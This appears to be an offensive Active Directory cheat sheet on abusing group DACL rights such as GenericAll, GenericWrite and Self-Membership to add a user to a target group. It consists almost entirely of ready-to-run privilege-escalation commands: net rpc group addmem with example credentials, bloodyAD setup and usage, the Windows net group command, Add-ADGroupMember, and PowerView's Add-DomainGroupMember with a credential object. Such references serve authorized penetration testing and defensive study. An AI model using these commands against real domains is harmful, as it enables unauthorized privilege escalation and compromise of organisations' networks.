PRIMARY CATEGORY → DACL ABUSE
An operator can abuse this DACL when the controlled user account has GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership over the target group
Abuse - UNIX-like
Net RPC (Samba Suite)
RPC Authentication
net rpc group addmem '<GROUP>' '<USER>' -U '<DOMAIN>/<USER>%<PASSWD>' -S '<TARGET>'e.g.
User A leverages GenericWrite over Group A to add User B to Group A
net rpc group addmem 'Group A' 'userB' 'domain.local/userA%password1234$!' -S 'dc.domain.local'
BloodyAD
LDAP Authentication
Setup
git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txtUsage
python3 bloodyAD.py --dc-ip '<DC_IP>' --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' add groupMember '<GROUP>' '<USER>'Abuse - Windows
Net Command
net group /domain /add '<GROUP>' '<USER>'AD Powershell Module
Add-ADGroupMember -Identity '<GROUP>' -Members '<USER>'Powerview
Add-DomainGroupMember
$pass = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>,', $pass)Add-DomainGroupMember -Credential $cred -Identity '<GROUP>' -Members '<USER>' -Verbose